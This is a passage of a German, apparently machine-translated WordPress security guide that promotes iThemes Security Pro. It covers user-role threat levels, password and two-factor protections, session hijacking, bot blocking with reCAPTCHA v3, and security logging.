Bevor wir verstehen können, wie wir unsere WordPress-Benutzer schützen können, müssen wir zuerst die Bedrohungsstufe jeder Art von kompromittierten Benutzern verstehen. Die Art und das Ausmaß des Schadens, den ein Angreifer anrichten kann, hängt stark von den Rollen und Fähigkeiten des Benutzers ab, den er hackt.

Administrator – Bedrohungsstufe hoch

Administratorbenutzer haben die Möglichkeiten, was immer sie wollen.

• Erstellen, Entfernen und Ändern von Benutzern.
• Installieren, entfernen und bearbeiten Sie Plugins und Themes.
• Erstellen, entfernen und bearbeiten Sie alle Beiträge und Seiten.
• Veröffentlichen und heben Sie die Veröffentlichung von Beiträgen und Seiten auf.
• Medien hinzufügen und entfernen.

Wenn ein Hacker einen der Administratoren Ihrer Website in die Finger bekommt, könnte er Ihre Website gegen Lösegeld halten. Wie bereits erwähnt, bezieht sich Ransomware darauf, wenn ein Hacker Ihre Website übernimmt und sie nicht an Sie zurückgibt, es sei denn, Sie zahlen ihnen eine hohe Gebühr.

Redakteur – Bedrohungsstufe hoch

Der Editor verwaltet den gesamten Inhalt der Website. Diese Benutzer haben immer noch ziemlich viel Macht.

• Erstellen, löschen und bearbeiten Sie alle Beiträge und Seiten.
• Veröffentlichen Sie alle Beiträge und Seiten und heben Sie die Veröffentlichung auf.
• Mediendateien hochladen.
• Verwalten Sie alle Links.
• Kommentare verwalten.
• Kategorien verwalten.

Wenn ein Angreifer die Kontrolle über das Konto eines Redakteurs übernimmt, könnte er eine Ihrer Seiten für einen Phishing-Angriff ändern. Phishing ist eine Art von Angriff, mit dem Benutzerdaten, einschließlich Anmeldeinformationen und Kreditkartennummern, gestohlen werden.

Phishing ist eine der sichersten Möglichkeiten, Ihre Website von Google auf die schwarze Liste zu setzen. Jeden Tag werden 10.000 Websites aus verschiedenen Gründen auf die Sperrliste von Google gesetzt.

Autor – Bedrohungsstufe Mittel

Der Autor wurde entwickelt, um eigene Inhalte zu erstellen und zu verwalten.

• Erstellen, löschen und bearbeiten Sie eigene Beiträge und Seiten.
• Veröffentlichen und veröffentlichen Sie ihre eigenen Beiträge.
• Mediendateien hochladen

Wenn ein Angreifer die Kontrolle über das Konto eines Autors erlangt, könnte er Seiten und Beiträge erstellen, die Ihre Site-Besucher auf bösartige Websites weiterleiten.

Mitwirkender und Abonnent – Bedrohungsstufe niedrig

Der Mitwirkende ist die Lite-Version der Benutzerrolle Autor. Sie haben keine Veröffentlichungsrechte.

• Erstellen und bearbeiten Sie ihre eigenen Beiträge.
• Löschen Sie ihre eigenen unveröffentlichten Beiträge.

Der Abonnent kann Dinge lesen, die die anderen Benutzer veröffentlichen.

Hacker mit der Rolle "Mitwirkender" oder "Abonnent" können zwar keine böswilligen Änderungen vornehmen, jedoch alle vertraulichen Informationen stehlen, die im Konto oder auf der Profilseite des Benutzers gespeichert sind.

6 Tipps zum Schutz Ihrer WordPress-Benutzer

Okay, das sind einige ziemlich üble Dinge, die Hacker mit unseren Websites anstellen können. Die gute Nachricht ist, dass die meisten Angriffe auf Ihre WordPress-Benutzerkonten mit nur geringem Aufwand Ihrerseits verhindert werden können.

Werfen wir einen Blick auf die Dinge, die Sie tun können, um Ihre WordPress-Benutzer zu schützen. Die Wahrheit ist, dass diese WordPress-Sicherheitsmethoden dazu beitragen, jede Art von WordPress-Benutzer zu schützen. Aber während wir jede der Methoden durchgehen, werden wir Sie wissen lassen, welche Benutzer Sie benötigen, um die Methode zu verwenden.

1. Geben Sie den Menschen nur die Fähigkeiten, die sie brauchen

Der einfachste Weg, Ihre Website zu schützen, besteht darin, Ihren Benutzern nur die Funktionen zu geben, die sie benötigen, und nicht mehr. Wenn jemand auf Ihrer Website nur seine eigenen Blog-Posts erstellen und bearbeiten möchte, muss er nicht die Möglichkeit haben, die Posts anderer Personen zu bearbeiten.

2. Sichern Sie WordPress-Benutzer mit starken Passwörtern

In einer von Splash Data zusammengestellten Liste war das am häufigsten verwendete Passwort in allen Datendumps 123456. Ein Datendump ist eine gehackte Datenbank, die mit Benutzerpasswörtern gefüllt ist, die irgendwo im Internet abgelegt wurden. Können Sie sich vorstellen, wie viele Personen auf Ihrer Website ein schwaches Passwort verwenden, wenn 123456 das häufigste Passwort in Datenabbildern ist?

Die Verwendung eines schwachen Passworts ist wie der Versuch, Ihre Haustür mit einem Stück Klebeband zu verriegeln. Es hat nie lange gedauert, bis Hacker sich durch ein schwaches Passwort in eine Website gewaltsam eindrangen. Jetzt, da Hacker Computergrafikkarten für ihre Angriffe nutzen, war die Zeit, die zum Knacken eines Passworts benötigt wird, noch nie so kurz.

Schauen wir uns zum Beispiel ein Diagramm an, das von Terahash, einem leistungsstarken Unternehmen zum Knacken von Passwörtern, erstellt wurde. Ihr Diagramm zeigt die Zeit, die benötigt wird, um ein Passwort mit einem Hashstack-Cluster von 448x RTX 2080s zu knacken.

Standardmäßig verwendet WordPress MD5, um in der WP-Datenbank gespeicherte Benutzerpasswörter zu hashen. Laut dieser Tabelle könnte Terahash also ein 8-stelliges Passwort knacken … fast sofort. Das ist nicht nur super beeindruckend, sondern auch wirklich gruselig. Die gute Nachricht ist, dass wir unser WordPress-Login sichern können, indem wir verlangen, dass unsere High-Level-Benutzer starke Passwörter verwenden.

Mit der Kennwortanforderungsfunktion von iThemes Security Pro können Sie bestimmte Benutzer zwingen, ein sicheres Kennwort zu verwenden. Aktivieren Sie die Funktion Kennwortanforderungen auf der Hauptseite der Sicherheitseinstellungen und wählen Sie dann die Benutzer aus, für die Sie ein sicheres Kennwort benötigen.

3. Abgelehnte kompromittierte Passwörter

Laut dem Verizon Data Breach Investigations Report verwenden über 70 % der Mitarbeiter Passwörter am Arbeitsplatz wieder. Aber die wichtigste Statistik aus dem Bericht ist, dass 81 % der Hacking-bezogenen Sicherheitsverletzungen entweder gestohlene oder schwache Passwörter nutzten.

Hacker verwenden eine Form von Brute-Force-Angriffen, die als Wörterbuchangriff bezeichnet wird. Ein Wörterbuchangriff ist eine Methode zum Einbruch in eine WordPress-Website mit häufig verwendeten Passwörtern, die in Datenbank-Dumps aufgetaucht sind. Die „Kollektion #1? Data Breach, die auf MEGA gehostet wurde, umfasste 1.160.253.228 eindeutige Kombinationen von E-Mail-Adressen und Passwörtern. Das ist eine Milliarde mit einem b. Diese Art von Punktzahl wird einem Wörterbuchangriff wirklich helfen, die am häufigsten verwendeten WordPress-Passwörter einzugrenzen.

Es ist ein Muss zu verhindern, dass Benutzer mit Fähigkeiten auf Autorenebene und höher kompromittierte Passwörter verwenden, um Ihr WordPress-Login zu sichern. Sie können auch darüber nachdenken, dass Ihre untergeordneten Benutzer keine kompromittierten Passwörter verwenden.

Es ist völlig verständlich und ermutigt, das Anlegen eines neuen Kundenkontos so einfach wie möglich zu gestalten. Ihr Kunde weiß jedoch möglicherweise nicht, dass das von ihm verwendete Passwort in einem Datendump gefunden wurde. Sie würden Ihrem Kunden einen großen Dienst erweisen, indem Sie ihn darauf aufmerksam machen, dass das von ihm verwendete Passwort kompromittiert wurde. Wenn sie dieses Passwort überall verwenden, könnten Sie ihnen später einige große Kopfschmerzen ersparen.

Die iThemes Security Pro-Funktion kompromittierte Passwörter ablehnen zwingt Benutzer dazu, Passwörter zu verwenden, die in keinem von Have I Been Pwned verfolgten Passwortverstößen aufgetreten sind. Aktivieren Sie die Funktion Kennwortanforderungen auf der Hauptseite der Sicherheitseinstellungen und wählen Sie dann die Benutzer aus, die Sie verhindern möchten, dass ein kompromittiertes Kennwort verwendet wird.

4. Sichern Sie WordPress-Benutzer mit Zwei-Faktor-Authentifizierung

Die Verwendung von Zwei-Faktor-Authentifizierungen ist das Beste, was Sie tun können, um Ihr WordPress-Login zu sichern. Die Zwei-Faktor-Authentifizierung ist ein Prozess zur Überprüfung der Identität einer Person, indem zwei separate Überprüfungsmethoden erforderlich sind. Google teilte in seinem Blog mit, dass die Verwendung der Zwei-Faktor-Authentifizierung 100% der automatisierten Bot-Angriffe stoppen kann. Ich mag diese Chancen sehr.

Die Zwei-Faktor-Authentifizierungsfunktion von iThemes Security Pro bietet eine Menge Flexibilität bei der Implementierung von 2fa auf Ihrer Website. Sie können die Zwei-Faktor-Funktion für alle oder einige Ihrer Benutzer aktivieren, und Sie können Ihre Benutzer auf hoher Ebene zwingen, bei jeder Anmeldung 2fa zu verwenden.

Für Ihre Bequemlichkeit bietet iThemes Security Pro 2 verschiedene Methoden der Zwei-Faktor-Authentifizierung.

1. Mobile App – Die mobile App-Methode ist die sicherste Methode der Zwei-Faktor-Authentifizierung von iThemes Security Pro. Diese Methode erfordert, dass Sie eine kostenlose mobile Zwei-Faktor-App wie Authy verwenden.
2. E-Mail – Die Zwei-Faktor- E- Mail-Methode sendet zeitkritische Codes an die E-Mail-Adresse Ihres Benutzers.
3. Backup-Codes – Eine Reihe von Einmalcodes, die für die Anmeldung verwendet werden können, falls die primäre Zwei-Faktor-Methode verloren geht.

5. Schützen Sie WordPress-Benutzer vor Session-Hijacking

WordPress generiert jedes Mal ein Sitzungscookie, wenn Sie sich auf Ihrer Website anmelden. Angenommen, Sie haben eine Browsererweiterung, die vom Entwickler aufgegeben wurde und keine Sicherheitsupdates mehr veröffentlicht. Leider hat die vernachlässigte Browsererweiterung eine Schwachstelle. Die Schwachstelle ermöglicht es böswilligen Akteuren, Ihre Browser-Cookies zu entführen, einschließlich des zuvor erwähnten WordPress-Sitzungscookies. Diese Art von Hack wird als Session Hijacking bezeichnet . Ein Angreifer kann also die Sicherheitslücke in der Erweiterung ausnutzen, um Ihre Anmeldung zu übertragen und böswillige Änderungen mit Ihrem WordPress-Benutzer vorzunehmen.

Sie sollten für Ihre Administratoren und Redakteure einen Schutz vor Session-Hijacking haben.

Mit der Trusted Devices- Funktion von iThemes Security Pro gehört Session Hijacking der Vergangenheit an. Wenn sich das Gerät eines Benutzers während einer Sitzung ändert, meldet iThemes Security den Benutzer automatisch ab, um unbefugte Aktivitäten auf dem Konto des Benutzers zu verhindern, wie z. B. das Ändern der E-Mail-Adresse des Benutzers oder das Hochladen schädlicher Plugins.

6. Erstellen Sie einen universellen Support-Benutzer

Jedes Mal, wenn Sie einen neuen Benutzer erstellen, fügen Sie einen weiteren Einstiegspunkt hinzu, den ein Hacker ausnutzen könnte. Es kann jedoch vorkommen, dass Sie für Ihre Website externe Hilfe benötigen, z. B. wenn Sie Unterstützung suchen oder einen unabhängigen Auftragnehmer eingestellt haben. Sie benötigen eine sichere Methode, um Ihrer Website temporären Administratorzugriff hinzuzufügen.

Angenommen, Sie haben Probleme mit einem der auf Ihrer Website installierten Plugins. Nachdem sie den Support kontaktiert haben, fordern sie Administratorzugriff auf Ihre Website an, damit sie sich genauer ansehen können. Das scheint eine völlig vernünftige Anfrage zu sein, und Sie entscheiden sich, ihnen Zugriff zu gewähren.

Wie geben wir also jemandem temporären Administratorzugriff auf unsere WordPress-Website?

Externen Zugriff auf Ihre Website gewähren: Die zwei Optionen

In der Regel haben Sie zwei Möglichkeiten , externen Zugriff auf Ihre Website bereitzustellen…. und beide sind nicht großartig .

1. Geben Sie die Anmeldeinformationen Ihres Benutzers frei

Ihre erste und schlechteste Option besteht darin, den Benutzernamen und das Passwort Ihres WordPress-Admin-Benutzers zu teilen.

Warum es schrecklich ist, Ihre Admin-Anmeldeinformationen zu teilen

• Reduzierte Sicherheit – Wenn Sie die Anmeldeinformationen Ihres Benutzers teilen, müssen Sie die Zwei-Faktor-Authentifizierung deaktivieren, damit sich die Person, die Ihre Anmeldeinformationen verwendet, anmelden kann. Google teilte in seinem Blog mit, dass die Verwendung der Zwei-Faktor-Authentifizierung oder der Bestätigung in zwei Schritten 100% der automatisierten Bot-Angriffe stoppen kann. Das Deaktivieren der Zwei-Faktor-Authentifizierung, auch nur für kurze Zeit, verringert die Sicherheit Ihrer Website drastisch.
• Unbequem – Wenn Sie Ihre Zugangsdaten teilen, müssen Sie Ihr Passwort ändern. Wenn Sie vergessen, Ihr Passwort zu ändern, gibt es eine oder mehrere Personen, die jederzeit Administratorzugriff auf Ihre Website haben.

2. Erstellen Sie einen neuen Benutzer für den Support-Techniker

Obwohl es besser ist, einen brandneuen Administratorbenutzer für den Supportspezialisten zu erstellen, als Ihre Administratoranmeldeinformationen zu teilen, ist es immer noch nicht großartig.

Warum es schrecklich ist, einen Benutzer für die Support-Technik zu erstellen

• Erhöhte Anfälligkeit – Das Erstellen eines neuen Administratorbenutzers fügt einen weiteren Einstiegspunkt hinzu, der ausgenutzt werden könnte. Wenn Sie keine Passwortrichtlinie haben, könnte der Support-Techniker ein schwaches Passwort wählen, wodurch Ihr WordPress-Login anfälliger für Angriffe wird.
• Unbequem – Das Einrichten eines neuen Benutzers jedes Mal, wenn Sie Hilfe von außen benötigen, ist zeitaufwändig. Sie müssen den neuen Benutzer erstellen und dann daran denken, den Benutzer zu löschen, wenn er keinen Zugriff mehr auf Ihre Website benötigt. Es ist eine bewährte WordPress-Sicherheitsmethode, alle ungenutzten Benutzer von Ihrer Website zu entfernen.

Was ist Privilege-Eskalation?

Mit der Funktion zur Rechteausweitung von iThemes Security Pro können Sie einem Benutzer vorübergehend zusätzliche Funktionen gewähren.

Privilege Escalation macht es einfach und sicher, einen universellen Benutzer zu erstellen, den Sie externen Entwicklern oder Support-Technikern geben können, die vorübergehenden Zugriff auf Ihre Website benötigen.

Mit Privilege Escalation können Sie einen neuen Benutzer erstellen und ihn Support nennen und ihm die Benutzerrolle Abonnent zuweisen. Wenn Sie das nächste Mal vorübergehenden Zugriff auf Ihre Website gewähren müssen, können Sie den Support-Benutzer von einem Abonnenten zu einem Administrator umwandeln. Wir werden später in diesem Beitrag erläutern, wie Sie dies tun können. Lassen Sie uns jedoch zuerst darüber sprechen, warum Privilege Escalation eine bessere Möglichkeit ist, Zugriff auf Ihre Website zu gewähren.

Warum Privilege Escalation besser ist

• Einfach – Sie müssen nicht jedes Mal einen neuen Benutzer erstellen, wenn Sie Zugriff auf Ihre Website gewähren müssen.
• Automatisch – Die Rechteeskalation dauert nur 24 Stunden. Nach Ablauf von 24 Stunden verliert der Benutzer automatisch alle zusätzlichen Berechtigungen. Sie müssen nicht daran denken, Benutzer zu entfernen oder Passwörter zu ändern.
• Keine Abstriche bei der Sicherheit – Sie können weiterhin verlangen, dass dieser universelle Support-Benutzer die E-Mail-Methode der Zwei-Faktor-Anmeldung verwendet, was bedeutet, dass Sie das gleiche Sicherheitsniveau wie bei Ihren anderen Admin-Benutzern haben. Da die eigentliche Benutzerrolle ein Abonnent ist, gehen Sie kein wirkliches Risiko ein, sie auf Ihrer Website zu belassen.

So verwenden Sie die Rechteeskalation in iThemes Security Pro

Um zu beginnen, aktivieren Sie die Privilege Escalation auf der Hauptseite der Sicherheitseinstellungen.

Sie können einen neuen Benutzer erstellen und ihn Support nennen und ihm die Benutzerrolle Abonnent zuweisen. Wenn Sie das nächste Mal vorübergehenden Zugriff auf Ihre Website gewähren müssen, navigieren Sie zur Profilseite Ihres Support-Benutzers.

Aktualisieren Sie die E-Mail-Adresse, damit der externe Support-Mitarbeiter ein neues Passwort anfordern kann. Scrollen Sie dann nach unten, bis Sie die Einstellungen für die temporäre Rechteausweitung sehen. Klicken Sie auf den Schalter Temporäre Rolle festlegen und wählen Sie Admin. Der Benutzer hat nun für die nächsten 24 Stunden Administratorzugriff.

Wenn sie nicht die vollen 24 Stunden benötigen, können Sie die Berechtigungseskalation auf der Benutzerprofilseite widerrufen. Wenn Sie mehr als 24 Stunden benötigen, können Sie die genaue Anzahl der Tage , die Sie in dem Feld Tag benötigen.

Einpacken

Die Popularität von WordPress macht es zu einem Ziel für Hacker auf der ganzen Welt. Wie bereits erwähnt, kann ein Angreifer Schaden anrichten, indem er selbst die unterste Ebene von WordPress-Benutzern hackt.

Die gute Nachricht ist, dass es zwar keine Möglichkeit gibt, Angriffe auf Ihre WordPress-Benutzer zu verhindern, aber mit ein wenig Aufwand unsererseits können wir den Erfolg der Angriffe verhindern.

Abschnitt 8: Schützen Sie Ihre Website vor schlechten Bots

In diesem Abschnitt des WordPress-Sicherheitsleitfadens erfahren Sie, was ein Bot ist und wie Sie verhindern können, dass schlechte Bots auf Ihrer Website Chaos anrichten.

Was ist ein Bot?

Ein Bot ist eine Software, die so programmiert ist, dass sie eine bestimmte Liste von Aufgaben ausführt. Entwickler erstellen eine Reihe von Anweisungen, die ein Bot automatisch befolgt, ohne dass der Entwickler ihnen sagen muss, dass sie loslegen sollen. Bots werden sich wiederholende und alltägliche Aufgaben viel schneller ausführen, als wir es können.

Verschiedene Bots crawlen ständig Ihre Website. Einige dieser Bots sind gut und bieten Ihnen einen wertvollen Dienst. Andere Bots haben ruchlosere Motive. Nehmen wir uns einen Moment Zeit, um darüber zu sprechen, was ein Bot ist und die verschiedenen Arten von Bots.

Die guten Bots

Bots überwachen – iThemes Sync Pro Uptime Monitoring verwendet einen Bot, um die Betriebszeit Ihrer Website zu überwachen. Der Bot überprüft Ihre Website alle 5 Minuten, um sicherzustellen, dass sie noch online ist. Wenn Ihre Website ausgefallen ist, sendet Ihnen der Bot eine Warnung, damit Sie Ihre Website wieder online schalten können.

Audit-Bots – Das iThemes Sync Pro Site Audit verwendet einen Google Lighthouse-Bot, um die Qualität Ihrer Webseiten zu überprüfen. Ein weiteres hervorragendes Beispiel für einen Audit-Bot ist ein defekter Linker-Checker, der Ihre Website durchsucht und nach Links sucht, die Sie an einen Ort weiterleiten, der nicht existiert.

Feeder-Bots – Ein hervorragendes Beispiel für einen Feeder-Bot ist Ihr Podcast-Player. Ihr Podcast-Player verwendet einen Bot, um die RSS-Feeds der von Ihnen abonnierten Podcasts zu überwachen und benachrichtigt Sie, wenn Ihr Lieblings-Podcast eine neue Episode veröffentlicht.

Suchmaschinen-Bots – Ein Google-Webcrawler ist ein Beispiel für einen Suchmaschinen-Bot. Diese Art von Bot durchsucht Ihre Website nach neuen oder geänderten Seiten und erstellt einen Index Ihrer Website. Sobald Google oder eine andere Suchmaschine einen Index Ihrer Website hat, können sie Ihre Seiten mit den Nutzern ihrer Suchmaschine teilen.

Security Bots – Der iThemes Security Pro Site Scan verwendet einen Bot, um die Liste Ihrer installierten Plugins und Themes mit unserer Schwachstellendatenbank abzugleichen. Wenn Sie ein Plugin oder Theme mit einer bekannten Schwachstelle installiert haben, wird der Bot automatisch einen Patch anwenden, falls einer verfügbar ist.

Die bösen Bots

Content Scraping Bots – Diese Bots sind so programmiert, dass sie die Inhalte Ihrer Website ohne Ihre Erlaubnis herunterladen. Der Bot kann den Inhalt duplizieren, um ihn auf der Website des Angreifers zu verwenden, um deren SEO zu verbessern und Ihren Website-Traffic zu stehlen.

Spambots – Spambots sind nervig. Sie werden Ihre Kommentare mit dem Versprechen vermasseln, Millionär zu werden, während sie von zu Hause aus arbeiten, in der Hoffnung, Ihre Besucher auf bösartige Websites zu schicken.

Brute-Force-Bots – Brute-Force-Bots durchsuchen das Internet auf der Suche nach WordPress-Logins, um sie anzugreifen. Sobald diese Bots auf einer Anmeldeseite landen, versuchen sie die einfachste Form des Zugriffs auf eine Website: indem sie immer wieder versuchen, Benutzernamen und Passwörter zu erraten, bis sie erfolgreich sind.

So blockieren Sie schlechte Bots, ohne gute Bots zu blockieren: reCAPTCHA V3

Google reCAPTCHA verhindert, dass böse Bots missbräuchliche Aktivitäten auf Ihrer Website ausführen, wie z.

Legitime Benutzer können sich jedoch anmelden, Einkäufe tätigen, Seiten anzeigen oder Konten erstellen. reCAPTCHA verwendet fortschrittliche Risikoanalysetechniken, um Menschen und Bots zu unterscheiden.

Die Google reCAPTCHA-Funktion in iThemes Security Pro schützt Ihre Website vor schlechten Bots. Diese Bots versuchen, mit kompromittierten Passwörtern in Ihre Website einzudringen, Spam zu posten oder sogar Ihre Inhalte abzukratzen. reCAPTCHA verwendet fortschrittliche Risikoanalysetechniken, um Menschen und Bots zu unterscheiden.

Das Tolle an reCAPTCHA Version 3 ist, dass Sie missbräuchlichen Bot-Traffic auf Ihrer Website ohne Benutzerinteraktion erkennen können. Anstatt eine CAPTCHA-Herausforderung anzuzeigen, überwacht reCAPTCHA v3 die verschiedenen Anfragen auf Ihrer Website und gibt für jede Anfrage eine Punktzahl zurück. Die Punktzahl reicht von 0,01 bis 1. Je höher die von reCAPTCHA zurückgegebene Punktzahl, desto sicherer ist es, dass ein Mensch die Anfrage gestellt hat. Je niedriger dieser von reCAPTCHA zurückgegebene Wert ist, desto sicherer ist es, dass ein Bot die Anfrage gestellt hat.

Mit iThemes Security Pro können Sie mithilfe des reCAPTCHA-Scores einen Blockierungsschwellenwert festlegen. Google empfiehlt die Verwendung von 0,5 als Standard. Denken Sie daran, dass Sie legitime Benutzer versehentlich aussperren könnten, wenn Sie den Schwellenwert zu hoch festlegen.

Sie können reCAPTCHA für Ihre WordPress-Benutzerregistrierung aktivieren, Ihr Passwort, Ihr Login und Ihre Kommentare zurücksetzen. Mit iThemes Security Pro können Sie das Google reCAPTCHA-Skript auf allen Seiten ausführen, um die Genauigkeit der Bot- und Human-Scores zu erhöhen.

Einpacken

Es gibt gute Bots und schlechte Bots. reCAPTCHA blockiert schlechte Bots von Ihrer Website, ohne den guten Bots, die einen Mehrwert bieten, in die Quere zu kommen.

Abschnitt 9: WordPress-Sicherheitsprotokolle

Die Protokollierung ist ein wesentlicher Bestandteil Ihrer WordPress-Sicherheitsstrategie. Eine unzureichende Protokollierung und Überwachung kann zu einer Verzögerung bei der Erkennung einer Sicherheitsverletzung führen. Die meisten Studien zu Sicherheitsverletzungen zeigen, dass die Zeit zur Erkennung einer Sicherheitsverletzung über 200 Tage beträgt! Diese Zeitspanne ermöglicht es einem Angreifer, in andere Systeme einzudringen, weitere Daten zu modifizieren, zu stehlen oder zu zerstören. Aus diesen Gründen landete Insufficient Logging in den OWASP Top 10 der Sicherheitsrisiken für Webanwendungen.

WordPress-Sicherheitsprotokolle haben mehrere Vorteile in Ihrer gesamten Sicherheitsstrategie.

1. Identifizieren und böswilliges Verhalten stoppen.
2. Erkennen Sie Aktivitäten, die Sie auf eine Sicherheitsverletzung aufmerksam machen können.
3. Bewerten Sie, wie viel Schaden angerichtet wurde.
4. Hilfe bei der Reparatur einer gehackten Website.

Wenn Ihre Website gehackt wird, möchten Sie die besten Informationen haben, um eine schnelle Untersuchung und Wiederherstellung zu unterstützen.

Was sind WordPress-Sicherheitsprotokolle?

WordPress-Sicherheitsprotokolle in iThemes Security Pro verfolgen wichtige Sicherheitsereignisse, die auf Ihrer Website auftreten. Diese Ereignisse müssen unbedingt überwacht werden, um anzuzeigen, ob oder wann eine Sicherheitsverletzung auftritt.

Die Sicherheitsprotokolle Ihrer Website sind ein wesentlicher Bestandteil jeder Sicherheitsstrategie. Die in diesen Aufzeichnungen enthaltenen Informationen können verwendet werden, um böswillige Akteure auszusperren, eine unerwünschte Änderung auf der Website hervorzuheben und den Eintrittspunkt eines erfolgreichen Angriffs zu identifizieren und zu beheben.

Von iThemes Security verfolgte und protokollierte Sicherheitsereignisse

Hier ist ein Blick auf die WordPress-Sicherheitsereignisse, die vom iThemes Security Pro-Plugin verfolgt werden.

1. WordPress Brute-Force-Angriffe

Brute-Force-Angriffe beziehen sich auf die Trial-and-Error-Methode, mit der Benutzernamen und Passwörter entdeckt werden, um sich in eine Website zu hacken. WordPress verfolgt keine Anmeldeaktivitäten von Benutzern, daher ist in WordPress nichts eingebaut, um Sie vor einem Brute-Force-Angriff zu schützen. Es liegt an Ihnen, Ihre Anmeldesicherheit zu überwachen, um Ihre WordPress-Site zu schützen.

Glücklicherweise ist ein Brute-Force-Angriff nicht sehr ausgefeilt und in Ihren Protokollen ziemlich einfach zu identifizieren. Sie müssen den Benutzernamen und die IP-Adresse aufzeichnen, mit der versucht wird, sich anzumelden und ob die Anmeldung erfolgreich war. Wenn Sie feststellen, dass ein einzelner Benutzername oder eine einzelne IP-Adresse aufeinanderfolgende fehlgeschlagene Anmeldeversuche hat, sind Sie wahrscheinlich einem Brute-Force-Angriff ausgesetzt.

Sobald Sie wissen, dass Ihre Website angegriffen wird, können Sie dem Einhalt gebieten! Beachten Sie, dass es keine Möglichkeit gibt, einen Angriff auf Ihre Website zu verhindern. Durch die Überwachung ungültiger Anmeldeversuche können Sie jedoch verhindern, dass diese Angriffe erfolgreich sind.

iThemes Security Pro ist großartig darin, Bösewichte auszusperren. Wenn jedoch ein Bösewicht den Benutzernamen Bob bei einem Brute-Force-Angriff verwendet und Bob ein tatsächlicher Benutzer der Site ist, würde Bob leider zusammen mit dem Angreifer ausgesperrt.

Auch wenn es sich gut anfühlt, Bösewichte davon abzuhalten, in eine Website einzudringen, mögen wir es nicht, wenn die Sicherheit die Erfahrung echter Benutzer beeinträchtigt. Wir haben Magic Links erstellt, um es legitimen Benutzern zu ermöglichen, die Sperrung des Benutzernamens zu umgehen, während der Brute-Force-Angreifer gesperrt bleibt.

2. Malware-Scans

Sie sollten nicht nur Malware-Scans durchführen, sondern auch die Ergebnisse jedes Malware-Scans in Ihren WordPress-Sicherheitsprotokollen aufzeichnen. Einige Sicherheitsprotokolle zeichnen nur Scanergebnisse auf, die Malware gefunden haben, aber das reicht nicht aus. Es ist wichtig, so schnell wie möglich über einen Verstoß gegen Ihre Website informiert zu werden. Je länger es dauert, bis Sie von einem Hack erfahren, desto mehr Schaden wird er anrichten.

Es fühlt sich zwar gut an, dass sich die Geschichte eines proaktiven Sicherheitsansatzes auszahlt, aber das ist nur ein Bonus und nicht der Grund, jeden Malware-Scan aufzuzeichnen.

Wenn Sie Ihre geplanten Scans nicht dokumentieren, können Sie nicht feststellen, ob Scanfehler aufgetreten sind. Wenn Sie fehlgeschlagene Scans nicht aufzeichnen, könnten Sie denken, dass Ihre Website täglich auf Malware überprüft wird, aber in Wirklichkeit wird der Scan nicht abgeschlossen.

Lesen Sie den Spotlight-Beitrag zur Site-Scan-Funktion, um zu erfahren, wie iThemes Security Pro Sie vor der Hauptursache für WordPress-Hacks schützen kann.

3. Benutzeraktivität

Die Aufzeichnung der Benutzeraktivität in Ihren WordPress-Sicherheitsprotokollen kann nach einem erfolgreichen Angriff Ihre Rettung sein.

Wenn Sie die richtige Benutzeraktivität überwachen, kann es Sie durch die Zeitleiste eines Hacks führen und alles anzeigen, was der Hacker geändert hat, vom Hinzufügen neuer Benutzer bis zum Hinzufügen unerwünschter Pharmawerbung auf Ihrer Website.

iThemes Security Pro überwacht 5 Arten von Benutzeraktivitäten:

1. Anmelden / Abmelden

Die erste Art der protokollierten Benutzeraktivität ist, wenn sich Benutzer bei Ihrer Website an- und abmelden und von wo aus. Die Überwachung von Zeit und Ort der Benutzeranmeldungen kann Ihnen helfen, einen kompromittierten Benutzer zu erkennen. Hat sich dieser Benutzer zu einem ungewöhnlichen Zeitpunkt oder von einem neuen Ort aus angemeldet? Wenn ja, können Sie Ihre Untersuchung mit ihnen beginnen.

2. Benutzererstellung / Registrierung

Die nächste Aktivität, die Sie protokollieren sollten, ist die Erstellung von Benutzern, insbesondere die Erstellung von Administratorbenutzern. Wenn ein Hacker einen legitimen Benutzer kompromittieren kann, kann er seinen eigenen Admin-Benutzer erstellen, um zu versuchen, verdeckt zu werden. Es ist leicht für Sie, etwas Seltsames mit Ihrem Konto zu bemerken, aber es ist viel schwieriger, bösartige Aktivitäten bei einem anderen Benutzer zu identifizieren.

Die Überwachung der Benutzerregistrierung ist ebenfalls unerlässlich. Einige Schwachstellen ermöglichen es Hackern, die standardmäßige neue Benutzerrolle von einem Abonnenten in einen Administrator zu ändern.

Wenn Sie die Benutzerprotokollierung nur so eingestellt haben, dass sie die Aktivität von Administratorbenutzern überwacht, wird nur die Registrierung neuer Admin-Benutzer in den Sicherheitsprotokollen aufgezeichnet. Wenn Sie also jemals einen neu registrierten Benutzer in Ihren Sicherheitsprotokollen sehen, ist etwas schief gelaufen.

3. Hinzufügen und Entfernen von Plugins

Es ist wichtig, festzuhalten, wer Plugins hinzufügt und entfernt. Sobald Ihre Website gehackt wurde, kann der Angreifer leicht sein benutzerdefiniertes Plugin hinzufügen, um bösartigen Code in die Website einzuschleusen.

Auch wenn ein Hacker keinen Zugriff auf Ihren Server oder Ihre Datenbank hat, kann er möglicherweise dennoch Änderungen über Ihr WordPress-Dashboard vornehmen. Mit einem Plugin können sie Weiterleitungen zu Ihrer Website hinzufügen, um sie in ihrer nächsten Spamvertize-Kampagne zu verwenden, oder Malware in Ihre Datenbank einschleusen. Nachdem ihr bösartiger Code ausgeführt wurde, können sie das Plugin löschen, um Beweise für ihr Verbrechen zu entfernen. Zum Glück werden wir nichts davon verpassen, da alles in unseren WordPress-Sicherheitsprotokollen dokumentiert wurde.

4. Themen wechseln

Eine weitere Benutzeraktivität, die von der Benutzerprotokollierung von iThemes Security Pro überwacht wird, besteht darin, dass jemand das Thema der Website wechselt. Wenn Sie jemals feststellen, dass sich Ihr Theme unerwartet geändert hat, können Sie in Ihren WordPress-Sicherheitsprotokollen nachsehen, wer die Änderung vorgenommen hat.

5. Änderungen an Beiträgen und Seiten

Schließlich möchten Sie alle Änderungen an Ihrem Beitrag und Ihren Seiten überwachen. Wurden Links hinzugefügt, um Ihren Datenverkehr an andere Websites weiterzuleiten? Die Überwachung von Beiträgen und Seiten kann Ihnen dabei helfen, peinliche Seiten oder bösartige Links zu finden, die Ihrer Website nach einer Sicherheitsverletzung hinzugefügt wurden.

Um herauszufinden, welcher Beitrag geändert wurde, klicken Sie auf die Links „ Details anzeigen“, um die Beitrags-ID zu finden.

Sehen Sie sich den Spotlight-Beitrag zur Benutzerprotokollierung an, um mehr darüber zu erfahren, wie die Überwachung der Benutzeraktivität Ihnen helfen kann, von einem Hack zurückzukommen.

Einpacken

